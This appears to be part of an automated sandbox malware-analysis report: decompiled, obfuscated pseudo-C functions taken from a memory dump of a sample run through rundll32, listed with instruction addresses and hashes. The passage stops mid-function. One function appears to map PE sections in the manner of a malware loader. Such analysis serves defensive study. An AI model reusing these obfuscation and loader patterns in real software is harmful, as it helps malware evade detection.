                                                                                                                                                            • Instruction Fuzzy Hash: 297140711083409FC369CF21D88A91FBBF1FBC4748F108A1DF29A9A260D3B59949CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037A55F Relevance: 2.7, Strings: 2, Instructions: 159COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0037A55F() {
				char _v520;
				signed int _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _t161;
				char* _t162;
				intOrPtr _t164;
				void* _t168;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				short* _t195;
				signed int* _t197;

				_t197 =  &_v584;
				_v528 = _v528 & 0x00000000;
				_v524 = _v524 & 0x00000000;
				_t168 = 0xe71c2f1;
				_v532 = 0xa0346f;
				_v560 = 0x45ed96;
				_t187 = 0x29;
				_v560 = _v560 / _t187;
				_t189 = 0x5d;
				_v560 = _v560 * 0x5e;
				_v560 = _v560 ^ 0x00ac5e2c;
				_v568 = 0x587b3f;
				_v568 = _v568 >> 1;
				_v568 = _v568 >> 6;
				_v568 = _v568 + 0x3200;
				_v568 = _v568 ^ 0x000d20ef;
				_v540 = 0x1767bf;
				_v540 = _v540 >> 0xa;
				_v540 = _v540 ^ 0x00010300;
				_v548 = 0xad8e3d;
				_v548 = _v548 ^ 0x5762e507;
				_v548 = _v548 ^ 0xbd28358e;
				_v548 = _v548 ^ 0xeae8e106;
				_v584 = 0xa1a61c;
				_v584 = _v584 * 0x38;
				_v584 = _v584 + 0xffff1963;
				_v584 = _v584 | 0xaacebf86;
				_v584 = _v584 ^ 0xabd4b38c;
				_v556 = 0xa4c35b;
				_v556 = _v556 / _t189;
				_v556 = _v556 | 0xf6aeb391;
				_v556 = _v556 ^ 0xf6ac7ee7;
				_v536 = 0xf31b8a;
				_v536 = _v536 | 0x87603e20;
				_v536 = _v536 ^ 0x87f7aca9;
				_v576 = 0x423791;
				_v576 = _v576 + 0xffffb580;
				_v576 = _v576 + 0x7a73;
				_v576 = _v576 ^ 0x7a6e2c80;
				_v576 = _v576 ^ 0x7a24ad4c;
				_v544 = 0x7ccdad;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x3e66d3ae;
				_v572 = 0x1eeccc;
				_v572 = _v572 | 0x2c9b1d75;
				_v572 = _v572 << 6;
				_t190 = 0x5b;
				_v572 = _v572 / _t190;
				_v572 = _v572 ^ 0x007e2283;
				_v552 = 0x119b6d;
				_t191 = 0x5a;
				_v552 = _v552 / _t191;
				_v552 = _v552 ^ 0xceecc8a8;
				_v552 = _v552 ^ 0xceebe4d8;
				_v580 = 0x5ef79f;
				_v580 = _v580 / _t187;
				_v580 = _v580 | 0x8cf80c97;
				_t192 = 0x3d;
				_v580 = _v580 / _t192;
				_v580 = _v580 ^ 0x02499ffb;
				do {
					while(_t168 != 0xc65bb2) {
						if(_t168 == 0x63f282e) {
							_t162 = E0038DA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
							_t197 =  &(_t197[4]);
							_t168 = 0xc65bb2;
							continue;
						}
						if(_t168 == 0xb3c9692) {
							_t164 =  *0x393e10; // 0x0
							__eflags = _t164 + 0x1c;
							return E00373BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
						}
						if(_t168 != 0xe71c2f1) {
							goto L15;
						}
						_t168 = 0x63f282e;
					}
					_v564 = 0x8b8c25;
					_v564 = _v564 * 0x78;
					_v564 = _v564 + 0xffff9cfb;
					_v564 = _v564 ^ 0x41694e51;
					_t161 = E0037CB52(_v584,  &_v520, _v556, _v536, _v576);
					_t197 =  &(_t197[3]);
					_t195 =  &_v520 + _t161 * 2;
					while(1) {
						_t162 =  &_v520;
						__eflags = _t195 - _t162;
						if(_t195 <= _t162) {
							break;
						}
						__eflags =  *_t195 - 0x5c;
						if( *_t195 != 0x5c) {
							L10:
							_t195 = _t195 - 2;
							__eflags = _t195;
							continue;
						}
						_t139 =  &_v564;
						 *_t139 = _v564 - 1;
						__eflags =  *_t139;
						if( *_t139 == 0) {
							__eflags = _t195;
							L14:
							_t168 = 0xb3c9692;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t168 - 0x6143c47;
				} while (__eflags != 0);
				return _t162;
			}































                                                                                                                                                            0x0037a55f
                                                                                                                                                            0x0037a565
                                                                                                                                                            0x0037a56c
                                                                                                                                                            0x0037a571
                                                                                                                                                            0x0037a576
                                                                                                                                                            0x0037a57e
                                                                                                                                                            0x0037a590
                                                                                                                                                            0x0037a595
                                                                                                                                                            0x0037a5a0
                                                                                                                                                            0x0037a5a3
                                                                                                                                                            0x0037a5a7
                                                                                                                                                            0x0037a5af
                                                                                                                                                            0x0037a5b7
                                                                                                                                                            0x0037a5bb
                                                                                                                                                            0x0037a5c0
                                                                                                                                                            0x0037a5c8
                                                                                                                                                            0x0037a5d0
                                                                                                                                                            0x0037a5d8
                                                                                                                                                            0x0037a5dd
                                                                                                                                                            0x0037a5e5
                                                                                                                                                            0x0037a5ed
                                                                                                                                                            0x0037a5f5
                                                                                                                                                            0x0037a5fd
                                                                                                                                                            0x0037a605
                                                                                                                                                            0x0037a612
                                                                                                                                                            0x0037a616
                                                                                                                                                            0x0037a61e
                                                                                                                                                            0x0037a626
                                                                                                                                                            0x0037a62e
                                                                                                                                                            0x0037a63e
                                                                                                                                                            0x0037a642
                                                                                                                                                            0x0037a64a
                                                                                                                                                            0x0037a652
                                                                                                                                                            0x0037a65a
                                                                                                                                                            0x0037a662
                                                                                                                                                            0x0037a66a
                                                                                                                                                            0x0037a672
                                                                                                                                                            0x0037a67a
                                                                                                                                                            0x0037a682
                                                                                                                                                            0x0037a68a
                                                                                                                                                            0x0037a692
                                                                                                                                                            0x0037a69a
                                                                                                                                                            0x0037a69f
                                                                                                                                                            0x0037a6a7
                                                                                                                                                            0x0037a6af
                                                                                                                                                            0x0037a6b7
                                                                                                                                                            0x0037a6c0
                                                                                                                                                            0x0037a6c5
                                                                                                                                                            0x0037a6c9
                                                                                                                                                            0x0037a6d1
                                                                                                                                                            0x0037a6df
                                                                                                                                                            0x0037a6e4
                                                                                                                                                            0x0037a6e8
                                                                                                                                                            0x0037a6f0
                                                                                                                                                            0x0037a6f8
                                                                                                                                                            0x0037a706
                                                                                                                                                            0x0037a70a
                                                                                                                                                            0x0037a71a
                                                                                                                                                            0x0037a726
                                                                                                                                                            0x0037a72f
                                                                                                                                                            0x0037a73c
                                                                                                                                                            0x0037a73c
                                                                                                                                                            0x0037a742
                                                                                                                                                            0x0037a772
                                                                                                                                                            0x0037a777
                                                                                                                                                            0x0037a77a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a77a
                                                                                                                                                            0x0037a746
                                                                                                                                                            0x0037a7f0
                                                                                                                                                            0x0037a7f5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a80f
                                                                                                                                                            0x0037a752
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a758
                                                                                                                                                            0x0037a758
                                                                                                                                                            0x0037a77e
                                                                                                                                                            0x0037a78f
                                                                                                                                                            0x0037a793
                                                                                                                                                            0x0037a79b
                                                                                                                                                            0x0037a7b3
                                                                                                                                                            0x0037a7bc
                                                                                                                                                            0x0037a7bf
                                                                                                                                                            0x0037a7d3
                                                                                                                                                            0x0037a7d3
                                                                                                                                                            0x0037a7d7
                                                                                                                                                            0x0037a7d9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a7c4
                                                                                                                                                            0x0037a7c8
                                                                                                                                                            0x0037a7d0
                                                                                                                                                            0x0037a7d0
                                                                                                                                                            0x0037a7d0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a7d0
                                                                                                                                                            0x0037a7ca
                                                                                                                                                            0x0037a7ca
                                                                                                                                                            0x0037a7ca
                                                                                                                                                            0x0037a7ce
                                                                                                                                                            0x0037a7dd
                                                                                                                                                            0x0037a7e0
                                                                                                                                                            0x0037a7e0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a7e0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a7ce
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a7e2
                                                                                                                                                            0x0037a7e2
                                                                                                                                                            0x0037a7e2
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: QNiA$sz
                                                                                                                                                            • API String ID: 0-294658094
                                                                                                                                                            • Opcode ID: 682f998a4001ed43f1c155042cb33f11fd60038c11f217245d7ea0fae09bc0a3
                                                                                                                                                            • Instruction ID: abf6c091fac08a1a441e2fab5aca1b21c0681e77d5f8c581c0bf842962c3caa1
                                                                                                                                                            • Opcode Fuzzy Hash: 682f998a4001ed43f1c155042cb33f11fd60038c11f217245d7ea0fae09bc0a3
                                                                                                                                                            • Instruction Fuzzy Hash: 0E7166715093819BC3A8CF66D58541FBBF1FBC4718F40891DF59AA6260D379CA098F87
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038C3A0 Relevance: 2.6, Strings: 2, Instructions: 150COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E0038C3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t137;
				void* _t149;
				void* _t159;
				void* _t161;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t188;
				void* _t193;
				intOrPtr* _t195;
				signed int* _t197;
				signed int* _t198;
				signed int* _t199;

				_push(_a16);
				_t195 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t137);
				_v4 = _v4 & 0x00000000;
				_v12 = 0x8437e8;
				_v8 = 0xdb9720;
				_v60 = 0xf5e956;
				_v60 = _v60 << 0xc;
				_t163 = 0x6b;
				_v60 = _v60 / _t163;
				_v60 = _v60 | 0x488cc8ef;
				_v60 = _v60 ^ 0x48eedbff;
				_v44 = 0x82c5a5;
				_v44 = _v44 | 0x04b6a6f1;
				_t164 = 0x4a;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0xf3bc2b72;
				_v40 = 0x882fad;
				_v40 = _v40 ^ 0x709d76bd;
				_v40 = _v40 + 0xffff52d2;
				_v40 = _v40 ^ 0x7014aba2;
				_v28 = 0x22e756;
				_v28 = _v28 + 0x769a;
				_v28 = _v28 ^ 0x002bcc4a;
				_v64 = 0xc290d0;
				_v64 = _v64 + 0xffff641a;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xbd78a131;
				_v64 = _v64 ^ 0x83ed8c94;
				_v32 = 0x78b1b0;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x2c621b2d;
				_v36 = 0xa1b61f;
				_v36 = _v36 + 0xb017;
				_v36 = _v36 | 0xc1836c3e;
				_v36 = _v36 ^ 0xc1a0ee75;
				_v56 = 0x2861cb;
				_v56 = _v56 / _t164;
				_v56 = _v56 << 0xd;
				_t165 = 0x1b;
				_v56 = _v56 / _t165;
				_v56 = _v56 ^ 0x00aa9f16;
				_v24 = 0x4a8582;
				_v24 = _v24 | 0x39704e96;
				_v24 = _v24 ^ 0x397cf0ca;
				_v52 = 0x9fdf3f;
				_v52 = _v52 | 0x733ecb9c;
				_v52 = _v52 >> 0x10;
				_t166 = 0x2c;
				_v52 = _v52 / _t166;
				_v52 = _v52 ^ 0x0002453b;
				_v20 = 0x70cd9;
				_v20 = _v20 ^ 0x0384d77a;
				_v20 = _v20 ^ 0x03811849;
				_v16 = 0x6ca56e;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 ^ 0x0be055d0;
				_v48 = 0x383b50;
				_v48 = _v48 + 0xe78c;
				_v48 = _v48 + 0x7960;
				_v48 = _v48 + 0xffff251b;
				_v48 = _v48 ^ 0x003eca00;
				_t167 = _v28;
				_t149 = E0037474F(_t167, __ecx, _v64, _v32);
				_t159 = _t149;
				_t197 =  &(( &_v64)[8]);
				if(_t159 != 0) {
					_push(_t167);
					_t188 = E0037A3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
					_t198 =  &(_t197[5]);
					if(_t188 == 0) {
						L6:
						return _t188;
					}
					E0037ED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
					_t199 =  &(_t198[3]);
					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
					while(_t193 < _t161) {
						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
						E0037ED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
						_t199 =  &(_t199[3]);
						_t193 = _t193 + 0x28;
					}
					goto L6;
				}
				return _t149;
			}


































                                                                                                                                                            0x0038c3a5
                                                                                                                                                            0x0038c3a9
                                                                                                                                                            0x0038c3ab
                                                                                                                                                            0x0038c3ad
                                                                                                                                                            0x0038c3b1
                                                                                                                                                            0x0038c3b5
                                                                                                                                                            0x0038c3b6
                                                                                                                                                            0x0038c3b7
                                                                                                                                                            0x0038c3bc
                                                                                                                                                            0x0038c3c3
                                                                                                                                                            0x0038c3cb
                                                                                                                                                            0x0038c3d3
                                                                                                                                                            0x0038c3db
                                                                                                                                                            0x0038c3e6
                                                                                                                                                            0x0038c3eb
                                                                                                                                                            0x0038c3f1
                                                                                                                                                            0x0038c3f9
                                                                                                                                                            0x0038c401
                                                                                                                                                            0x0038c409
                                                                                                                                                            0x0038c416
                                                                                                                                                            0x0038c419
                                                                                                                                                            0x0038c41d
                                                                                                                                                            0x0038c425
                                                                                                                                                            0x0038c42d
                                                                                                                                                            0x0038c435
                                                                                                                                                            0x0038c43d
                                                                                                                                                            0x0038c445
                                                                                                                                                            0x0038c44d
                                                                                                                                                            0x0038c455
                                                                                                                                                            0x0038c45d
                                                                                                                                                            0x0038c465
                                                                                                                                                            0x0038c46d
                                                                                                                                                            0x0038c472
                                                                                                                                                            0x0038c47a
                                                                                                                                                            0x0038c482
                                                                                                                                                            0x0038c48a
                                                                                                                                                            0x0038c48f
                                                                                                                                                            0x0038c497
                                                                                                                                                            0x0038c49f
                                                                                                                                                            0x0038c4a7
                                                                                                                                                            0x0038c4af
                                                                                                                                                            0x0038c4b7
                                                                                                                                                            0x0038c4c7
                                                                                                                                                            0x0038c4cb
                                                                                                                                                            0x0038c4d4
                                                                                                                                                            0x0038c4d9
                                                                                                                                                            0x0038c4df
                                                                                                                                                            0x0038c4e7
                                                                                                                                                            0x0038c4ef
                                                                                                                                                            0x0038c4f7
                                                                                                                                                            0x0038c4ff
                                                                                                                                                            0x0038c507
                                                                                                                                                            0x0038c50f
                                                                                                                                                            0x0038c518
                                                                                                                                                            0x0038c51b
                                                                                                                                                            0x0038c51f
                                                                                                                                                            0x0038c527
                                                                                                                                                            0x0038c52f
                                                                                                                                                            0x0038c537
                                                                                                                                                            0x0038c53f
                                                                                                                                                            0x0038c54c
                                                                                                                                                            0x0038c550
                                                                                                                                                            0x0038c55a
                                                                                                                                                            0x0038c562
                                                                                                                                                            0x0038c56a
                                                                                                                                                            0x0038c572
                                                                                                                                                            0x0038c57a
                                                                                                                                                            0x0038c58a
                                                                                                                                                            0x0038c58e
                                                                                                                                                            0x0038c593
                                                                                                                                                            0x0038c595
                                                                                                                                                            0x0038c59a
                                                                                                                                                            0x0038c5a9
                                                                                                                                                            0x0038c5c3
                                                                                                                                                            0x0038c5c5
                                                                                                                                                            0x0038c5ca
                                                                                                                                                            0x0038c628
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c62a
                                                                                                                                                            0x0038c5dd
                                                                                                                                                            0x0038c5e6
                                                                                                                                                            0x0038c5f0
                                                                                                                                                            0x0038c5f5
                                                                                                                                                            0x0038c623
                                                                                                                                                            0x0038c60a
                                                                                                                                                            0x0038c618
                                                                                                                                                            0x0038c61d
                                                                                                                                                            0x0038c620
                                                                                                                                                            0x0038c620
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c627
                                                                                                                                                            0x0038c630

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: V"$`y
                                                                                                                                                            • API String ID: 0-2031334757
                                                                                                                                                            • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                                            • Instruction ID: e29cc621af6aa69c1800f9a46c30f6205f4f8b1b59ff35d242c1567c9fbb27e8
                                                                                                                                                            • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                                            • Instruction Fuzzy Hash: 0C6145B15183409FC354CF66C88991BBBF1FBC9718F108A1CF69A9A260D7B6D919CF06
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00380B19 Relevance: 2.6, Strings: 2, Instructions: 144COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00380B19(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				void* _t160;
				void* _t164;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				intOrPtr _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int* _t194;

				_t194 =  &_v68;
				_v12 = 0xec215;
				_v8 = 0x867af3;
				_t190 =  *0x393208; // 0x0
				_v4 = 0;
				_t164 = __ecx;
				_v64 = 0x2d9572;
				_t191 = _t190 + 0x20c;
				_v64 = _v64 + 0xffff7051;
				_v64 = _v64 ^ 0xb4c09ebb;
				_v64 = _v64 | 0x08f8e0e6;
				_v64 = _v64 ^ 0xbcfdfbfe;
				_v40 = 0xaf9231;
				_v40 = _v40 + 0x3789;
				_v40 = _v40 + 0x1acf;
				_v40 = _v40 ^ 0x00adbfc0;
				_v68 = 0xf5f340;
				_v68 = _v68 ^ 0x3b0075db;
				_v68 = _v68 >> 1;
				_v68 = _v68 + 0xaae2;
				_v68 = _v68 ^ 0x1dff90e5;
				_v24 = 0xe1803e;
				_v24 = _v24 + 0x946c;
				_v24 = _v24 ^ 0x00ebebe2;
				_v44 = 0xcb8087;
				_t166 = 0x7f;
				_v44 = _v44 / _t166;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x00394faa;
				_v32 = 0x6e7c9c;
				_v32 = _v32 << 0xf;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x00f599ec;
				_v36 = 0x8d7ece;
				_v36 = _v36 + 0xd96f;
				_v36 = _v36 + 0x3e8b;
				_v36 = _v36 ^ 0x008d6b01;
				_v60 = 0x740a18;
				_v60 = _v60 + 0x5af6;
				_t167 = 0x2d;
				_v60 = _v60 / _t167;
				_t168 = 0xc;
				_v60 = _v60 / _t168;
				_v60 = _v60 ^ 0x000f4a79;
				_v48 = 0xecd979;
				_v48 = _v48 + 0xffff2496;
				_t169 = 3;
				_v48 = _v48 / _t169;
				_v48 = _v48 ^ 0xbc9c03a4;
				_v48 = _v48 ^ 0xbcdb2390;
				_v52 = 0x17ff93;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0x3109;
				_v52 = _v52 ^ 0x7590f195;
				_v52 = _v52 ^ 0x8a641707;
				_v20 = 0x28811b;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x05ddec85;
				_v56 = 0x23ad29;
				_t170 = 0x5a;
				_v56 = _v56 / _t170;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x06fabbcf;
				_v56 = _v56 ^ 0x06fdb2ad;
				_v28 = 0x8d9789;
				_v28 = _v28 | 0x3813f7c3;
				_v28 = _v28 + 0xa24c;
				_v28 = _v28 ^ 0x38ab2d0e;
				_v16 = 0x83a12;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x41de3db0;
				while(1) {
					_t192 =  *_t191;
					if(_t192 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
						L4:
						 *_t191 =  *_t192;
						_t160 = E00388519(_v28, _v16, _t192);
					} else {
						_t133 =  &_v40; // 0xebebe2
						_t160 = E00378DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
						_t194 =  &(_t194[4]);
						if(_t160 != _v64) {
							_t191 = _t192;
						} else {
							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
							E00389E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
							E00381E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
							_t194 =  &(_t194[5]);
							goto L4;
						}
					}
				}
				return _t160;
			}
































                                                                                                                                                            0x00380b19
                                                                                                                                                            0x00380b1c
                                                                                                                                                            0x00380b26
                                                                                                                                                            0x00380b32
                                                                                                                                                            0x00380b3a
                                                                                                                                                            0x00380b3e
                                                                                                                                                            0x00380b40
                                                                                                                                                            0x00380b48
                                                                                                                                                            0x00380b4e
                                                                                                                                                            0x00380b56
                                                                                                                                                            0x00380b5e
                                                                                                                                                            0x00380b66
                                                                                                                                                            0x00380b6e
                                                                                                                                                            0x00380b76
                                                                                                                                                            0x00380b7e
                                                                                                                                                            0x00380b86
                                                                                                                                                            0x00380b8e
                                                                                                                                                            0x00380b96
                                                                                                                                                            0x00380b9e
                                                                                                                                                            0x00380ba2
                                                                                                                                                            0x00380baa
                                                                                                                                                            0x00380bb2
                                                                                                                                                            0x00380bba
                                                                                                                                                            0x00380bc2
                                                                                                                                                            0x00380bca
                                                                                                                                                            0x00380bd8
                                                                                                                                                            0x00380bdd
                                                                                                                                                            0x00380be3
                                                                                                                                                            0x00380be8
                                                                                                                                                            0x00380bf0
                                                                                                                                                            0x00380bf8
                                                                                                                                                            0x00380bfd
                                                                                                                                                            0x00380c02
                                                                                                                                                            0x00380c0a
                                                                                                                                                            0x00380c12
                                                                                                                                                            0x00380c1a
                                                                                                                                                            0x00380c22
                                                                                                                                                            0x00380c2a
                                                                                                                                                            0x00380c32
                                                                                                                                                            0x00380c3e
                                                                                                                                                            0x00380c43
                                                                                                                                                            0x00380c4d
                                                                                                                                                            0x00380c52
                                                                                                                                                            0x00380c58
                                                                                                                                                            0x00380c60
                                                                                                                                                            0x00380c68
                                                                                                                                                            0x00380c74
                                                                                                                                                            0x00380c77
                                                                                                                                                            0x00380c7b
                                                                                                                                                            0x00380c83
                                                                                                                                                            0x00380c8b
                                                                                                                                                            0x00380c93
                                                                                                                                                            0x00380c98
                                                                                                                                                            0x00380ca0
                                                                                                                                                            0x00380ca8
                                                                                                                                                            0x00380cb0
                                                                                                                                                            0x00380cbd
                                                                                                                                                            0x00380cc1
                                                                                                                                                            0x00380cc9
                                                                                                                                                            0x00380cd9
                                                                                                                                                            0x00380cdc
                                                                                                                                                            0x00380ce0
                                                                                                                                                            0x00380ce5
                                                                                                                                                            0x00380ced
                                                                                                                                                            0x00380cf5
                                                                                                                                                            0x00380cfd
                                                                                                                                                            0x00380d05
                                                                                                                                                            0x00380d0d
                                                                                                                                                            0x00380d15
                                                                                                                                                            0x00380d1d
                                                                                                                                                            0x00380d22
                                                                                                                                                            0x00380d9d
                                                                                                                                                            0x00380d9d
                                                                                                                                                            0x00380da1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380d2f
                                                                                                                                                            0x00380d8a
                                                                                                                                                            0x00380d95
                                                                                                                                                            0x00380d97
                                                                                                                                                            0x00380d31
                                                                                                                                                            0x00380d41
                                                                                                                                                            0x00380d45
                                                                                                                                                            0x00380d4a
                                                                                                                                                            0x00380d51
                                                                                                                                                            0x00380dab
                                                                                                                                                            0x00380d53
                                                                                                                                                            0x00380d58
                                                                                                                                                            0x00380d6a
                                                                                                                                                            0x00380d82
                                                                                                                                                            0x00380d87
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380d87
                                                                                                                                                            0x00380d51
                                                                                                                                                            0x00380d2f
                                                                                                                                                            0x00380daa

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 1$
                                                                                                                                                            • API String ID: 0-209397207
                                                                                                                                                            • Opcode ID: caadbf1ff78a5c7f74b484d861a07374aec65739c84b0573b06005148360be51
                                                                                                                                                            • Instruction ID: 303af6821e89709f5d7878f8f414f73142045ca4e665a778525a70b49f81efba
                                                                                                                                                            • Opcode Fuzzy Hash: caadbf1ff78a5c7f74b484d861a07374aec65739c84b0573b06005148360be51
                                                                                                                                                            • Instruction Fuzzy Hash: 5D614FB25083419FC399DF21D48940BBBF1FBC9728F509A1DF19A96260C7B1DA4ACF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037AEFB Relevance: 2.6, Strings: 2, Instructions: 141COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E0037AEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t116;
				void* _t130;
				intOrPtr _t133;
				void* _t137;
				intOrPtr* _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				void* _t162;

				_t135 = _a12;
				_push(_a16);
				_t154 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t116);
				_v44 = 0xe8605f;
				_t162 = _t161 + 0x18;
				_v44 = _v44 + 0x84a0;
				_v44 = _v44 ^ 0x00e8e4ff;
				_t155 = 0;
				_v68 = 0xe00e28;
				_t137 = 0xc99b7e9;
				_v68 = _v68 << 9;
				_v68 = _v68 << 2;
				_t156 = 0x3b;
				_v68 = _v68 / _t156;
				_v68 = _v68 ^ 0x0001eb63;
				_v76 = 0x5a4023;
				_v76 = _v76 >> 0xf;
				_t157 = 0x5b;
				_v76 = _v76 * 0x13;
				_v76 = _v76 ^ 0x64c481b8;
				_v76 = _v76 ^ 0x64ccd277;
				_v64 = 0xe36df4;
				_v64 = _v64 / _t157;
				_t158 = 9;
				_v64 = _v64 * 0x52;
				_v64 = _v64 ^ 0x00c8b522;
				_v80 = 0x952e3b;
